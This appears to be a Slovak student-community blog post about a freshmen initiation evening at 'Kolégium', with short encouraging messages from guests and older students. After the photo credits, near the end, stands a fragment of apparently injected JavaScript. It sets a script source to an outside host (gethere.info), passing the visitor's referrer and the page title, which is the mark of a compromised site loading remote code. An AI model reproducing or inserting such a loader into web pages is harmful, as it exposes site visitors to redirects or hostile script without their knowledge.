Aký je tvoj odkaz študentom siedmeho ročníka Kolégia?

V piatok, 9. októbra, sa veľká sála kaštieľa naplnila čulým ruchom beánie študentov siedmeho ročníka Kolégia. Večer sa niesol v znamení Stredozeme, „KANa prsteňov“, dobrého jedla a skvelej zábavy. Čerství študenti zložili slávnostný sľub, dostali spečatený dokument a obradný „ťuk“ po hlave Etikou Nikomachovou. Hostia využili svoju možnosť odkázať im pár slov:

IMG_3315

Mária Anežka Zigová

priateľka študentky KAN7

Berte si príklad z veľkých osobností a nasledujte ich. Hľadajte veci očiam skryté, lebo tie sú najdôležitejšie. Ceňte si to, že ste vytvorili spoločenstvo plné krásnych a vzácnych ľudí a môžete sa navzájom podporovať.

 

IMG_3197

 

Dominik Kotvan

študent KAN4

Keďže si myslím, že Kolégium je zároveň privilégium i zodpovednosť, využite čas, ktorý ste získali naplno v akademickej oblasti, duchovnom pilieri a vytvorte jedno spoločenstvo. Aby sa vám išiel mozog „uvariť“ zo všetkého, čo načerpáte! V dobrom slova zmysle…

 

 

IMG_3301

Filip Morjak

študent KAN6, súčasný stážista na Svoradove

Každé dobro, ktoré budete zažívať v Kolégiu berte ako dar a vychutnávajte si ho plnými dúškami.

 

 

 

 

Laura SenderákováIMG_3295

priateľka študentky KAN7

Prajem vám, aby ste si našli dostatočný čas na štúdium. Tým pádom, že je tento rok jedinečnou príležitosťou získať mnohé dary Kolégia, aby na to nikdy nezabúdali a stále „pili z prameňa“.

 

 

 

IMG_3313

Zuzana Malotová

súrodenec študenta KAN7

Štúdium je super vec, ale nikdy nezabudnite, že ide v prvom rade o vzťahy. Vážte si ľudí okolo seba, ktorí vám dávajú akýkoľvek feedback, vnímajte názory rodiny, priateľov, známych…nemusíte podľa nich „skákať“, ale svojím úprimným záujmom o ľudí okolo seba si vzťahy zachováte a zveľadíte. Nezabudnite, že všetci múdri čerpali vždy z múdrosti iných. Je to o ľuďoch!

IMG_3238

 

Michal Pikna

kamarát mnohých študentov KAN

Zmeňte svet tým, že začnete v prvom rade od seba. Buďte vytrvalí vo svojej snahe, lebo Slovensko takých ľudí skutočne potrebuje. Precestoval som nedávno pár krajín a vidím, že naša spoločnosť má veľké rezervy, ale i obrovský potenciál.

 

IMG_3148

Juraj Šúst

akademik KAN

Popri romantickej láske nezabudnite na lásku k Pravde.

 

 

 

IMG_3108

 

Janko Štofka

študent KAN2

Staňte sa takými  „špongiami“ v dobrom slova zmysle – aby ste do seba nasávali poznanie o Pravde, o sebe aj o ľuďoch, s ktorými tvoríte komunitu. No nenechávajte si to len pre seba, ale zavlažujte týmto bohatstvom  „suchšie miesta“  nášho sveta kamkoľvek pôjdete.

 

IMG_3252

Ondrej Malota

súrodenec študenta KAN7

Nemudrujte príliš tam, kde netreba! To, že ste boli vybraní do Kolégia využite najviac, ako je vo vašich silách. Úprimne, myslel som si, že budete uzavretou skupinou, ale dnes som sa presvedčil, že s radosťou prijímate medzi sebou kohokoľvek, kto medzi vás zavíta – to je veľké plus.

 

 

text: Justína Malysová | foto: Silvia Jamrichová

študentky KAN7

 s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

0 komentárov

Zanechajte komentár

Chcete sa pripojiť k diskusii?
Neváhajte prispieť!

Pridaj komentár

Vaša e-mailová adresa nebude zverejnená. Vyžadované polia sú označené *